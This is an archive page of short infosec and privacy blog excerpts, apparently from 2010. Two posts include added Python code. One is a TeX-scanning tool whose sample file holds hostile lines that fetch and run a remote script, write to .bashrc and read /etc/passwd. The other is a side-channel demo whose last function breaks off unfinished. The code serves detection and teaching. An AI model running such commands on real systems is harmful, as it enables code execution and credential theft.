Via the Miami Herald: An underwire bra stopped a Miami attorney from seeing her client held at the Miami Federal Detention Center, setting off controversy over the inmate facility’s dress code. The issue here isn’t so much the dress code (though it is problematic) but inconsistent enforcement of previously agreed upon rules. It’s hard to […]

 

Saturn's Moon Enceladus

NASA claims that: At least four distinct plumes of water ice spew out from the south polar region of Saturn’s moon Enceladus in this dramatically illuminated image. Light reflected off Saturn is illuminating the surface of the moon while the sun, almost directly behind Enceladus, is backlighting the plumes. See Bursting at the Seams to […]

 

Fines or Reporting?

Over at the Office of Inadequate Security, Dissent does excellent work digging into several perspectives on Discover Card breaches: Discover’s reports, and the (apparent) silence of breached entities. I’m concerned that for many of the breaches they report, we have never seen breach reports filed by the entities themselves nor media reports on the incidents. […]

 
 

ID theft, its Aftermath and Debix AfterCare

In the past, I’ve been opposed to calling impersonation frauds “identity theft.” I’ve wondered why the term impersonation isn’t good enough. As anyone who’s read the ID Theft Resource Center’s ‘ID Theft Aftermath’ reports (2009 report) knows, a lot of the problem with long-term impersonation problems is the psychological impact of disassociation from your […]

 

Airplane Crashes Fall Because Experts Pontificate

The New York Times has a story, “Fatal Crashes of Airplanes Decline 65% Over 10 Years:” …part of the explanation certainly lies in the payoff from sustained efforts by American and many foreign airlines to identify and eliminate small problems that are common precursors to accidents. If only we did the same for security. This […]

 

Book review: "The Human Contribution"

James Reason’s entire career was full of mistakes. Most of them were other people’s. And while we all feel that way, in his case, it was really true. As a professor of psychology, he made a career of studying human errors and how to prevent them. He has a list of awards that’s a full […]

 

6502 Visual Simulator

In 6502 visual simulator, Bunnie Huang writes: It makes my head spin to think that the CPU from the first real computer I used, the Apple II, is now simulateable at the mask level as a browser plug-in. Nothing to install, and it’s Open-licensed. How far we have come…a little more than a decade ago, […]

 
 

Fair Warning: I haven't read this report, but…

@pogowasright pointed to “HOW many patient privacy breaches per month?:” As regular readers know, I tend to avoid blogging about commercial products and am leery about reporting results from studies that might be self-serving, but a new paper from FairWarning has some data that I think are worth mentioning here. In their report, they provide […]

 

Fake voting cards in Afghanistan?

NPR is talking about fraudulent ID cards and people voting multiple times. What happened to the purple ink solution? How did we end up exporting bad thinking about security to Afghanistan?

 
 

Use crypto. Not too confusing. Mostly asymmetric.

A little ways back, Gunnar Peterson said “passwords are like hamburgers, taste great but kill us in long run wean off password now or colonoscopy later.” I responded: “Use crypto. Not too confusing. Mostly asymmetric.” I’d like to expand on that a little. Not quite so much as Michael Pollan, but a little. The first […]

 

Don't fight the zeitgeist, CRISC Edition

Some guy recently posted a strangely self-defeating link/troll/flame in an attempt to (I think) argue with Alex and/or myself regarding the relevance or lack thereof of ISACA’s CRISC certification.  Now given that I think he might have been doing it to drive traffic to his CRISC training site, I won’t show him any link love […]

 

Dear CloudTards: "Securing" The Cloud isn't the problem…

@GeorgeResse pointed out this article http://www.infoworld.com/d/cloud-computing/five-facts-every-cloud-computing-pro-should-know-174 from @DavidLinthicum today.  And from a Cloud advocate point of view I like four of the assertions.  But his point about Cloud Security is off: “While many are pushing back on cloud computing due to security concerns, cloud computing is, in fact, as safe as or better than most […]

 

Michael Healey: Pay Attention (Piling On)

Richard Bejtlich has a post responding to an InformationWeek article written by Michael Healey, ostensibly about end user security.  Richard upbraids Michael for writing the following: Too many IT teams think of security as their trump card to stop any discussion of emerging tech deemed too risky… Are we really less secure than we were […]

 

Friday WTF?

CSO Online has an article based on an unlinked Forrester study that claims: The survey of 2,803 IT decision-makers worldwide found improving business continuity and disaster recovery capabilities is the number one priority for small and medium businesses and the second highest priority for enterprises. (emphasis mine). The WTF Pie Chart Says:

 

Dear AT&T

You never cease to amaze me with your specialness. You’ve defined a way to send MMS on a network you own, with message content you control, and there’s no way to see the full message: In particular, I can’t see the password that I need to see the message.

 

SOIRA Presentation/Meeting TOMORROW, 10:30 EST!

Hey everyone! Pete Lindstrom will be giving us his “Risk 2.0” presentation tomorrow via webex at 10:30 EST. I’ve seen the deck, and it will be a great preso. Topic: Risk Analysis Date: Thursday, September 9, 2010 Time: 10:30 am, Eastern Daylight Time (New York, GMT-04:00) Meeting Number: 748 861 569 Meeting Password: risk?whatrisk? ——————————————————- […]

 

Data breach fines will prolong the rot

The UK’s Financial Services Authority has imposed a £2.28 million fine for losing a disk containing the information about 46,000 customers. (Who was fined is beside the point here.) I agree heartily with John Dunn’s “Data breach fines will not stop the rot,” but I’d like to go further: Data breach fines will prolong the […]

 

The lumbering ogre of Enterprise Governance is no replacement for real Quality Management.

Gideon Rasmussen, CISSP, CISA, CISM, CIPP, writes in his latest blog post (http://www.gideonrasmussen.com/article-22.html) about the BP Oil spill and operational risk, and the damages the spill is causing BP.  Ignoring the hindsight bias of the article here… “This oil spill is a classic example of a black swan (events with the potential for severe impact […]

 

Saturday Corn Baking

Well, following on Arthur’s post on baking bread, I wanted to follow up with “how to bake corn:” Please go read “Baked Buttered Corn” A way to bring some happiness to the end of summer is to take this corn and simply bake it with butter. It’s fabulous. The starchy corn juices create a virtual […]

 

Friday Bread Baking

A few folks have asked, so here’s my general bread recipe in baker’s percentages. In baker’s percentages everything is based on a ratio compared to the weight of the flour. The formula for my bread is: 100% Whole wheat flour (I’m a geek, I grind my own) 72% Water (or whey) 2% Salt 1% Yeast […]

 

Petroski on Engineering

As I was reading the (very enjoyable) “To Engineer is Human,” I was struck by this quote, in which Petroski first quotes Victorian-era engineer Robert Stephenson, and then comments: …he hoped that all the casualties and accidents, which had occurred during their progress, would be noticed in revising the Paper; for nothing was so instructive […]

 

Quantum Crypto is Quantum Backdoored, But It's Not a Problem

Nature reports that Quantum Cryptography has been completely broken in “Hackers blind quantum cryptographers.” Researcher Vadim Makarov of the Norwegian University of Science and Technology constructed an attack on a quantum cryptography system that “gave 100% knowledge of the key, with zero disturbance to the system,” as Makarov put it. There have been other attacks […]

 

OSF looking for DataLossDB help

The folks running the Open Security Foundation’s DataLossDB are asking for some fully tax-deductible help meeting expenses. I’ve blogged repeatedly about the value of this work, and hope that interested EC readers can assist in supporting it. With new FOIA-able sources of information becoming available, now seems to be a great time to help out.

 

Transparency, India, Voting Machines

India’s EVMs are Vulnerable to Fraud. And for pointing that out, Hari Prasad has been arrested by the police in India, who wanted to threaten and intimidate him question him about where he got the machine that he studied. That’s a shame. The correct response is to fund Hari Prasad’s work, not use the police […]

 

Wikileaks

Friday night an arrest warrant went out, and was then rescinded, for Wikileaks founder Julian Assange. He commented “We were warned to expect “dirty tricks”. Now we have the first one.” Even the New York Times was forced to call it “strange.” I think that was the wrong warning. Wikileaks is poking at a very […]

 

Measurement Theory & Risk Posts You Should Read

These came across the SIRA mailing list. They were so good, I had to share: https://eight2late.wordpress.com/2009/07/01/cox%E2%80%99s-risk-matrix-theorem-and-its-implications-for-project-risk-management/ http://eight2late.wordpress.com/2009/12/18/visualising-content-and-context-using-issue-maps-an-example-based-on-a-discussion-of-coxs-risk-matrix-theorem/ http://eight2late.wordpress.com/2009/10/06/on-the-limitations-of-scoring-methods-for-risk-analysis/ Thanks to Kevin Riggins for finding them and pointing them out.

 

P != NP and Security

There’s been a lot of discussion about the paper written by mathematician Vinay Deolalikar on this interesting problem. The P!=NP problem is so interesting that there’s a million-dollar prize for solving it. It might even be interesting because there’s a million-dollar prize for solving it. It might also have some applicability to computer science and […]

 

Databases or Arrests?

From Dan Froomkin, “FBI Lab’s Forensic Testing Backlog Traced To Controversial DNA Database,” we see this example of the mis-direction of key funds: The pressure to feed results into a controversial, expansive DNA database has bogged down the FBI’s DNA lab so badly that there is now a two-year-and-growing backlog for forensic DNA testing needed […]

 

How not to address child ID theft

(San Diego, CA) Since the 1980’s, children in the US have been issued Social Security numbers (SSN) at birth. However, by law, they cannot be offered credit until they reach the age of 18. A child’s SSN is therefore dormant for credit purposes for 18 years. Opportunists have found novel ways to abuse these “dormant” […]

 

Dating and InfoSec

So if you don’t follow the folks over at OKCupid, you are missing out on some hot data. In case you’re not aware of it, OKCupid is: the best dating site on earth. Compiling our observations and statistics from the hundreds of millions of user interactions we’ve logged, we use this outlet to explore the […]

 

Bleg: Picture editor?

I used to use “Galerie” on my Mac to put nice pretty frames around pictures I posted here. (See some examples.) Galerie was dependent on … blah, blah, won’t work anymore without some components no longer installed by default. So I’m looking for a replacement that will, with little effort, put pictures in a nice […]

 

Making it up so you don't have to

If you don’t have time to develop a data-driven, business focused security strategy, we sympathize. It’s a lot of hard work. So here to help you is “What the fuck is my information security ‘strategy?’ “: Thanks, N!

 

Jon Callas on Comedies, Tragedy and PKI

Prompted by Peter Gutmann: [0] I’ve never understood why this is a comedy of errors, it seems more like a tragedy of errors to me. Jon Callas of PGP fame wrote the following for the cryptography mail list, which I’m posting in full with his permission: That is because a tragedy involves someone dying. Strictly […]

 

New low in pie charts

It’s not just a 3d pie chart with lighting effects and reflection. Those are common. This one has been squished. It’s wider than it is tall. While I’m looking closely, isn’t “input validation” a superset of “buffer errors” “code injection” and “command injection?” You can get the “Application Security Trends report for Q1-Q2 2010” from […]

 

Transparent Lies about Body Scanners

In “Feds Save Thousands of Body Scan Images,” EPIC reports: In an open government lawsuit against the United States Marshals Service, EPIC has obtained more than one hundred images of undressed individuals entering federal courthouses. The images, which are routinely captured by the federal agency, prove that body scanning devices store and record images of […]

 

Illogical Cloud Positivism

Last we learned, Peter Coffee was Director of Platform Research for salesforce.com.  He also blogs on their corporate weblog, CloudBlog, a blog that promises “Insights on the Future of Cloud Computing”. He has a post up from last week that called “Private Clouds, Flat Earths, and Unicorns” within which he tries to “bust some myths” […]

 

What They Know (From the WSJ)

Interesting interactive data app from the Wall Street Journal about your privacy online and what various websites track/know about you. http://blogs.wsj.com/wtk/ Full disclosure, our site uses Mint for traffic analytics.

 

Black Hat Slides

My talk at Black Hat this year was “Elevation of Privilege, the Easy Way to Get Started Threat Modeling.” I covered the game, why it works and where games work. The link will take you to the PPTX deck.

 

Credit Scores and Deceptive Advertising

Frank Pasquale follows a Joe Nocera article on credit scores with a great roundup of issues that the credit system imposes on American citizens, including arbitrariness, discriminatory effects and self-fulfilling prophecies. His article is worth a look even if you think you understand credit scores. I’d like to add one more danger of credit scores: […]

 
 

Cisco's Artichoke of Attack

Cisco has their security report up – find it here.  My favorite part?  “The Artichoke of Attack”

 

SOUPS Keynote & Slides

This week, the annual Symposium on Usable Privacy and Security (SOUPS) is being held on the Microsoft campus. I delivered a keynote, entitled “Engineers Are People Too:” In “Engineers Are People, Too” Adam Shostack will address an often invisible link in the chain between research on usable security and privacy and delivering that usability: the […]

 

Society of Information Risk Analysts Webex/Meeting Tomorrow

Hey, just so you all know, SOIRA is having our lunch (or breakfast) Al-Desko Webex.  This month we have the pleasure of watching Chris Hayes show how to use quantitative risk analysis for real, pragmatic business purposes.  It’s going to be seriously useful. Join SOIRA here:  http://groups.google.com/group/InfoRiskSociety?hl=en for the invite.

 

Survey Results

First, thanks to everyone who took the unscientific, perhaps poorly worded survey. I appreciate you taking time to help out.  I especially appreciate the feedback from the person who took the time to write in: “Learn the proper definition of “Control Systems” as in, Distributed Control Systems or Industrial Control systems. These are the places […]

 

A Blizzard of Real Privacy Stories

Over the last week, there’s been a set of entertaining stories around Blizzard’s World of Warcraft games and forums. First, “World of Warcraft maker to end anonymous forum logins,” in a bid to make the forums less vitriolic: Mr Brand said that one Blizzard employee posted his real name on the forums, saying that there […]

 

Risk -> Operational Security Survey

Hi, I’m very interested right now in finding the quality of risk analysis as it relates to operational security. If you’re a risk analyst, a security executive, or operational security analyst, would you mind taking a one question survey? It’s on SurveyMonkey, here: http://www.surveymonkey.com/s/GCSXZ2Q

 
 

The Next Unexpected Failure of Government

In looking at Frank Pasquale’s very interesting blog post “Secrecy & the Spill,” a phrase jumped out at me: I have tried to give the Obama Administration the benefit of the doubt during the Gulf/BP oil disaster. There was a “grand ole party” at Interior for at least eight years. Many Republicans in Congress would […]

 

GAO report on the state of Federal Cyber Security R&D

This GAO Report is a good overall summary of the state of Federal cyber security R&D and why it’s not getting more traction.    Their recommendations (p22) aren’t earth-shaking: “…we are recommending that the Director of the Office of Science and Technology Policy, in conjunction with the national Cybersecurity Coordinator, direct the Subcommittee on Networking and […]

 

In Congress Assembled, July 4, 1776

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

ISACA CRISC – A Faith-Based Initiative? Or, I Didn't Expect The Spanish Inquisition

In comments to my “Why I Don’t Like CRISC” article, Oliver writes: CobIT allows to segregate what is called IT in analysable parts.  Different Risk models apply to those parts. e.g. Information Security, Architecture, Project management. In certain areas the risk models are more mature (Infosec / Project Management) and in certain they are not […]

 

Thinking about Cloud Security & Vulnerability Research: Three True Outcomes

When opining on security in “the cloud” we, as an industry, speak very much in terms of real and imagined threat actions.  And that’s a good thing: trying to anticipate security issues is a natural, prudent task. In Lori McVittie’s blog article, “Risk is not a Synonym for “Lack of Security”, she brings up an […]

 
 

RiskIT – Does ISACA Suffer From Dunning-Kruger?

Just to pile on a bit…. You ever hear someone say something, and all of the sudden you realize that you’ve been trying to say exactly that, in exactly that manner, but hadn’t been so succinct or elegant at it?  That someone much smarter than you had already thought about the subject a whole lot […]

 

CRISC? C-Whatever

Alex’s posts on CRISC are, according to Google, more authoritative than the CRISC site itself: Not that it matters.  CRISC is proving itself irrelevant by failing to make anyone care.  By way of comparison, I googled a few other certifications for the audit and security world, then threw in the Certified Public […]

 

CRISC -O

PREFACE:  You might interpret this blog post as being negative about risk management here, dear readers.  Don’t. This isn’t a diatribe against IRM, only why “certification” around information risk is a really, really silly idea. Apparently, my blog about why I don’t like the idea of CRISC has long-term stickiness.  Just today, Philip writes in […]

 

Between an Apple and a Hard Place

So the news is all over the web about Apple changing their privacy policy. For example, Consumerist says “Apple Knows Where Your Phone Is And Is Telling People:” Apple updated its privacy policy today, with an important, and dare we say creepy new paragraph about location information. If you agree to the changes, (which you […]

 

Bleh, Disclosure

Lurnene Grenier has a post up on the Google/Microsoft vulnerability disclosure topic. I commented on the SourceFire blog (couldn’t get the reminder from Zdnet about my password, and frankly I’m kind of surprised I already had an account – so I didn’t post there), but thought it was worth discussing my comments here a bit […]

 

Measuring The Speed of Light Using Your Microwave

Using a dish full of marshmallows.  We’re doing this with my oldest kids, and while I was reading up on it, I had to laugh out loud at the following: …now you have what you need to measure the speed of light. You just need to know a very fundamental equation of physics: Speed of […]

 

Alex on Science and Risk Management

Alex Hutton has an excellent post on his work blog: Jim Tiller of British Telecom has published a blog post called “Risk Appetite, Counting Security Calories Won’t Help”. I’d like to discuss Jim’s blog post because I think it shows a difference in perspectives between our organizations. I’d also like to counter a few of […]

 

High Impact Work

Perry Metzger recently drew this to my attention: The title of my talk is, “You and Your Research.” It is not about managing research, it is about how you individually do your research. I could give a talk on the other subject – but it’s not, it’s about you. I’m not talking about ordinary run-of-the-mill […]

 

On Politics

In “Jon Stewart on Obama’s executive power record” Glenn Greenwald writes: When ACLU Executive Director Anthony Romero last week addressed the progressive conference America’s Future Now, he began by saying: “I’m going to start provocatively . . . I’m disgusted with this president.” Last night, after Obama’s Oval Office speech, Jon Stewart began his show […]

 

Bleg: How to Delete Kindle Logs?

Well, Amazon has a new update for Kindle (with folders! OMG!), and I’m planning to apply it. However, last time I installed an update, I noticed that it lost the “wireless off” setting, and was apparently contacting Amazon. I don’t want it to do so, and leave wireless off. It’s safer that way, whatever promises […]

 

Breach Laws & Norms in the UK & Ireland

Ireland has proposed a new Data Breach Code of Practice, and Brian Honan provides useful analysis: The proposed code strives to reach a balance whereby organisations that have taken appropriate measures to protect sensitive data, e.g. encryption etc., need not notify anybody about the breach, nor if the breach affects non-sensitive personal data or small […]

 

Redesign BP's Logo

I like this one a lot. Go vote for your favorite at BP Logo Redesign contest.

 

Mobile Money for Haiti: a contest

This is cool: The Bill & Melinda Gates Foundation is using its financial clout to push the Haitian marketplace toward change by offering $10 million in prizes to the first companies to help Haitians send and receive money with their cell phones… The fund will offer cash awards to companies that initiate mobile financial services […]

 

Excellent Post On Maturity Scale for Log Management

http://raffy.ch/blog/2010/06/07/maturity-scale-for-log-management-and-analysis/ Raffael Marty’s great post on how to measure the maturity level of your log management program. Excellent as always.

 

Lady Ada books opening May 11

Ada’s Technical Books is Seattle’s only technical book store located in the Capitol Hill neighborhood of Seattle, Washington. Ada’s specifically carries new, used, & rare books on Computers, Electronics, Physics, Math, and Science as well as hand-picked inspirational and leisure reading, puzzles, brain teasers, and gadgets geared toward the technically minded customer. From the store’s […]

 

Thanks!

Andrew and I want to say thank you to Dave Marsh. His review of our book includes this: I’d have to say that the first few pages of this book had more of an impact on me than the sum of all the pages of any other security-related book I had ever read It’s really […]

 

Decision Making Not Analysis Paralysis

There’s been a lot of pushback against using Risk Management in Information Security because we don’t have enough information to make a good decision. Yet every security professional makes decisions despite a lack of information. If we didn’t we’d never get anything done. Hell we’d never get out of bed in the morning. There’s a […]

 

Facebook Links

Some worthwhile reads on Facebook and privacy: Facebook’s Privacy Reboot: Is That all You’ve Got for Us? “The devil is in the defaults” Entire Facebook Staff Laughs As Man Tightens Privacy Settings

 

30 vs 150,000

For your consideration, two articles in today’s New York Times. First, “How to Remind a Parent of the Baby in the Car?:” INFANTS or young children left inside a vehicle can die of hyperthermia in a few hours, even when the temperature outside is not especially hot. It is a tragedy that kills about 30 […]

 

B-Sides Las Vegas Call For Papers

Friend of the blog and TV’s own <grin> Chris Nickerson has firmed up B-Sides for Las Vegas and is looking for a few good people to submit a few good presos. I spoke last year with David Mortman and it was awesome.  Chris put on a really good event/space for us all. I encourage you […]

 

ANNOUNCEMENT: The Society of Information Risk Analysts

I was talking with (the now nationally famous) Rich Mogull at Secure360 last week in St. Paul (fabulous security gathering, btw, I highly recommend it), and he reiterated his position that we had too much “echo chamber” and not enough engagement with everyone – especially our peers who are down in the trenches and too […]

 

Life

Today will be remembered along with the landing on the moon and the creation of the internet: Researchers at the J. Craig Venter Institute (JCVI), a not-for-profit genomic research organization, published results today describing the successful construction of the first self-replicating, synthetic bacterial cell. The team synthesized the 1.08 million base pair chromosome of a […]

 

We'll always have Facebook…

Waitress Is Fired for Her Complaint on Facebook: Lesson Learned for Employers?. From [German Consumer Protection] Minister Aigner to Mark Zuckerberg: the importance of privacy Farewell, Facebook “Why one super-connected internet enthusiast decided it was time to pull the plug” 5 WTFs: I quit Facebook Today Quit Facebook Day versus 10 Reasons You’ll Never Quit […]

 

This is what science is for

In “The Quest for French Fry Supremacy 2: Blanching Armageddon,” Dave Arnold of the French Culinary Institute writes: Blanching fries does a lot for you – such as: killing the enzymes that make the potatoes turn purpley-brown. Blanching is always necessary if the potatoes will be air-dried before frying. gelatinizing the starch. During frying, pre-cooked […]

 

Where's the Checks and Balances, Mr. Cameron?

[Update: See Barry’s comments, I seem to misunderstand the proposal.] The New York Times headlines “ Britain’s New Leaders Aim to Set Parliament Term at 5 Years.” Unlike the US, where we have an executive branch of government, the UK’s executive is the Prime Minister, selected by and from Parliament. As I understand things, the […]

 

Malware reports? (A bleg)

I’m doing some work that involves seeing what people are saying about the state of malware in 2010, and while search terms like “malware report” get a lot of results, they don’t always help me find things like the Symantec ISTR, the McAfee threats report or the Microsoft SIR. To date, I’ve found reports from Cisco, […]

 

Welcome to the club!

As EC readers may know, I’ve been sort of a collector of breach notices, and an enthusiastic supporter of the Open Security Foundation’s DataLossDB project. Recently, I had an opportunity to further support DataLossDB, by making an additional contribution to their Primary Sources archive – a resource I find particularly valuable. Unfortunately, that contribution was […]

 

Facebook Privacy

If you haven’t seen http://mattmckeon.com/facebook-privacy/‘s graphic of how Facebook’s default privacy settings have evolved, it’s worth a look:

 

Getting the time dimension right

If you are developing or using security metrics, it’s inevitable that you’ll have to deal with the dimension of time. “Data” tells you about the past. “Security” is a judgement about the present. “Risk” is a cost of the future, brought to the present. The way to marry these three is through social learning processes.

 

Word!

We show that malicious TeX, BibTeX, and METAPOST files can lead to arbitrary code execution, viral infection, denial of service, and data exfiltration, through the file I/O capabilities exposed by TeX’s Turing-complete macro language. This calls into doubt the conventional wisdom view that text-only data formats that do not access the network are likely safe. […]
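The abstract above makes the point that a “text-only” format with file I/O in its macro language is not inert. As an added example (not code from the paper or from this blog), here is a small pre-compile gate a reviewer might run over untrusted .tex submissions: it flags the primitives that reach outside the document (shell escape, file writes, absolute-path reads). The sample document and the rule list are constructed for illustration; whether any given hit is actually exploitable depends on the engine’s configuration (whether shell escape is enabled, and TeX Live’s openout_any setting), so the scanner flags intent, not exploitability.

```python
"""Scan TeX source for primitives that reach outside the document."""
from __future__ import annotations

import re

# Constructed sample input (not from the paper): a harmless-looking .tex file
# carrying the file-I/O and shell-escape primitives the abstract warns about.
SAMPLE_TEX = r"""
\documentclass{article}
\begin{document}
Hello, reviewers.
\newwrite\out
\immediate\openout\out=../../.bashrc
\immediate\write\out{curl http://example.invalid/x | sh}
\immediate\closeout\out
\immediate\write18{cat /etc/passwd}
\input{/etc/hostname}
\end{document}
"""

# (name, pattern, why it matters). This rule set is an assumption about what a
# reviewer wants flagged, not an exhaustive catalogue of TeX's I/O primitives.
RULES = [
    ("shell-escape", re.compile(r"\\write18\b"),
     "runs a shell command when TeX is invoked with shell escape enabled"),
    ("file-write", re.compile(r"\\openout\b"),
     "opens a file for writing; reachable paths depend on openout_any"),
    ("file-read", re.compile(r"\\(?:input|include)\b\s*\{?\s*/"),
     "reads an absolute path outside the document directory"),
]


def scan_tex(source: str) -> list[tuple[int, str, str]]:
    """Return (line_number, rule_name, stripped_line) for every matching line.

    Comments are removed first so a '%' neither hides nor causes a hit, while an
    escaped '\\%' (a literal percent sign) is kept as document text.
    """
    findings = []
    for lineno, raw in enumerate(source.splitlines(), start=1):
        # Cut at the first '%' that is not preceded by a backslash.
        line = re.split(r"(?<!\\)%", raw, maxsplit=1)[0]
        for name, pattern, _why in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def is_suspicious(source: str) -> bool:
    """True when any rule fires; usable as a gate before compiling untrusted TeX."""
    return bool(scan_tex(source))


if __name__ == "__main__":
    for lineno, name, line in scan_tex(SAMPLE_TEX):
        why = next(w for n, _p, w in RULES if n == name)
        print(f"line {lineno}: [{name}] {line}\n    {why}")
```

Run against the sample, the scanner reports the \openout, \write18 and absolute-path \input lines and ignores the \write to an already-open stream, which is exactly the case a human reviewer would also have to chase by hand.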

 

Taxman

Let me tell you how it will be There’s one for you, nineteen for me Chorus: If privacy appear too small Be grateful I don’t take it all Thanks to Jim Harper for the link.

 

"Cyber Economic Incentives" is one of three themes at Federal Cybersecurity R&D Kickoff Event

This event will be the first discussion of these Federal cybersecurity R&D objectives and will provide insights into the priorities that are shaping the direction of Federal research activities. One of the three themes is “Cyber economic incentives — foundations for cyber security markets, to establish meaningful metrics, and to promote economically sound secure practices.”

 

Because Money Is Liberty Coined

I really love these redesigns of the US Dollar: There’s a contest, and I like these designs by Michael Tyznik the most. On a graphical level, they look like money. He’s integrated micro-printing, aligned printing (that $5 in the upper left corner, it’s really hard to print so it works when you look at light) […]

 

A personal announcement

I will be entering the PhD program in Computational Social Science (with certificates in InfoSec and Economic Systems Design) at George Mason University, Fairfax VA, starting in the Fall of 2010.

 

It's Hard to Nudge

There’s a notion that government can ‘nudge’ people to do the right thing. Big examples include letting people opt-out of organ donorship, rather than opting in (rates of organ donorship go from 10-20% to 80-90%, which is pretty clearly a better thing than putting those organs in the ground or crematoria). Another classic example was […]

 

Earth, from the surface of Mars

This is the first image ever taken of Earth from the surface of a planet beyond the Moon. It was taken by the Mars Exploration Rover Spirit one hour before sunrise on the 63rd Martian day, or sol, of its mission. (March 8, 2004) Credit: NASA Goddard’s flickr stream.

 

How to Get Started In Information Security, the New School Way

There have been a spate of articles lately with titles like “The First Steps to a Career in Information Security” and “How young upstarts can get their big security break in 6 steps.” Now, neither Bill Brenner nor Marisa Fagan are dumb, but both of their articles miss the very first step. And it’s important […]

 

Lies, Damned Lies and Inappropriate Baselines

Thomas Ricks wrote a blog on Foreign Policy titled “Another reason to support Obamacare.” In it, he cited a Stars & Stripes report that one out of five veterans under the age of 24 is out of work. However, Stars and Stripes compares total unemployment to 18-24 male vet unemployment. It took me less than […]

 

The Liquids ban is a worse idea than you thought

According to new research at Duke University, identifying an easy-to-spot prohibited item such as a water bottle may hinder the discovery of other, harder-to-spot items in the same scan. Missing items in a complex visual search is not a new idea: in the medical field, it has been known since the 1960s that radiologists tend […]

 

Failure to Notify Leads to Liability in Germany

…a Bad Homburg business man won millions in damages in a suit against the [Liechtenstein] bank for failing to reveal that his information was stolen along with hundreds of other account holders and sold to German authorities for a criminal investigation. He argued that if the bank had informed those on the list that their […]

 

Evil Clown Stalking for your Birthday?

Dominic Deville stalks young victims for a week, sending chilling texts, making prank phone calls and setting traps in letterboxes. He posts notes warning children they are being watched, telling them they will be attacked. But Deville is not an escaped lunatic or some demonic monster. He is a birthday treat, hired by mum and […]

 

Parkour Generations Video

I could pretend to tie this to information security, talking about risk and information sharing, but really, it’s just beautiful to watch these folks learn to play:

 

Source, Data or Methodology: Pick at least one

In the “things you don’t want said of your work” department, Ars Technica finds these gems in a GAO report: This estimate was contained in a 2002 FBI press release, but FBI officials told us that it has no record of source data or methodology for generating the estimate and that it cannot be corroborated…when […]

 

J.C. Penny knew best

JC Penney, Wet Seal: Gonzalez Mystery Merchants JCPenney and Wet Seal were both officially added to the list of retail victims of Albert Gonzalez on Friday (March 26) when U.S. District Court Judge Douglas P. Woodlock refused to continue their cloak of secrecy and removed the seal from their names. StorefrontBacktalk had reported last August […]

 
 

Friday Visualization: Wal-mart edition

I’ve seen some cool Walmart visualizations before, and this one at FlowingData is no exception. The one thing I wondered about as I watched was if it captured store closings–despite the seemingly inevitable march in the visualization, there have been more than a few.

 

Elsewhere…

Things are busy and chaotic, but while I’m unable to blog, here’s some audio and video I’ve done recently that you might enjoy: “Meeting of the Minds” with Andy Jaquith and myself in either text or audio. Face-Off with Hugh Thompson “Has social networking changed data privacy forever?” Video

 

On Uncertain Security

One of the reasons I like climate studies is because the world of the climate scientist is not dissimilar to ours.  Their data is fraught with uncertainty, it has gaps, and it might be kind of important (regardless of your stance on anthropogenic global warming, I think we can all agree that when the climate […]

 

Makeup Patterns to hide from face detection

Adam Harvey is investigating responses to the growing ubiquity of surveillance cameras with facial recognition capabilities. He writes: My thesis at ITP, is to research and develop privacy enhancing counter technology. The aim of my thesis is not to aid criminals, but since artists sometimes look like criminals and vice versa, it is important to […]

 
 

Cyberdeterrence Papers

This just came past my inbox: The National Research Council (NRC) is undertaking a project entitled “Deterring Cyberattacks: Informing Strategies and Developing Options for U.S. Policy.” The project is aimed at fostering a broad, multidisciplinary examination of strategies for deterring cyberattacks on the United States and the possible utility of these strategies for the U.S. […]

 

Life without Certificate Authorities

Since it seems like I spent all of last week pronouncing that ZOMG!  SSL and Certificate Authorities is Teh Doomed!, I guess that this week I should consider the alternatives.  Fortunately, from the Tor Project Blog, we learn what life is like without CAs: Browse to a secure website, like https://torproject.org/. You should get the intentionally […]

 

Going Dutch: Time for a Breach Notification Law

The European Digital Rights Initiative mentions that “Bits of Freedom starts campaign for data breach notification law:” A data breach notification obligation on telecom providers is already to be implemented on the basis of the ePrivacy Directive, but Bits of Freedom insisted that this obligation should be extended also to other corporations and organisations. It […]

 

Your RIVACY is important to us

…so important that we didn’t even proofread our rivacy policy. I’m hopeful that they apply more due care to how they administer their policy, but fear it’s like a dirty restaurant bathroom. If they don’t bother to take care of what the public sees, what are they doing in the kitchen? From “Commercial Terms of […]

 

More Bad News for SSL

I haven’t read the paper yet, but Schneier has a post up which points to a paper, “Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow,” by Shuo Chen, Rui Wang, XiaoFeng Wang, and Kehuan Zhang, about a new side-channel attack which allows an eavesdropper to infer information about the contents of an SSL […]
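To make the class of leak concrete, here is an added example (not the paper’s code or data): a constructed autocomplete endpoint whose JSON responses differ in length for each letter the user types. Since TLS preserves plaintext length up to a fixed overhead, an eavesdropper who has queried the public endpoint once per candidate input can map observed ciphertext sizes straight back to the input. The suggestion table, the per-record overhead constant and the padding block sizes are all assumptions chosen for illustration.

```python
"""Traffic-analysis demo: response length alone identifies the user's input."""
from __future__ import annotations

import json
from collections import defaultdict

# Constructed suggestion data; stands in for the server's autocomplete table.
SUGGESTIONS = {
    "a": ["apple", "avocado", "apricot"],
    "b": ["banana", "blueberry"],
    "c": ["cherry", "cranberry", "coconut", "clementine"],
    "d": ["date", "dragonfruit", "durian"],
    "e": ["elderberry"],
    "f": ["fig"],
}

# Assumed fixed per-record overhead (header, nonce, tag). Any constant works:
# the attack only needs length differences to survive encryption.
TLS_OVERHEAD = 29


def response_body(prefix: str) -> bytes:
    """What the server would send back for a typed prefix."""
    return json.dumps({"q": prefix, "s": SUGGESTIONS.get(prefix, [])}).encode()


def pad_to_block(body: bytes, block: int) -> bytes:
    """Mitigation: pad to a multiple of `block` so many bodies share one size."""
    return body + b" " * ((-len(body)) % block)


def ciphertext_len(body: bytes, block: int = 1) -> int:
    """The eavesdropper's observation: padded plaintext length plus overhead."""
    return len(pad_to_block(body, block)) + TLS_OVERHEAD


def build_oracle(block: int = 1) -> dict[int, set[str]]:
    """Attacker precomputation: observable size -> inputs that produce it.

    Requires nothing but access to the same public application.
    """
    oracle: dict[int, set[str]] = defaultdict(set)
    for prefix in SUGGESTIONS:
        oracle[ciphertext_len(response_body(prefix), block)].add(prefix)
    return dict(oracle)


def infer_input(observed_len: int, oracle: dict[int, set[str]]) -> set[str]:
    """Candidates consistent with one observed record size."""
    return oracle.get(observed_len, set())


def uniquely_identified(block: int = 1) -> int:
    """How many inputs a single observed size pins down with certainty."""
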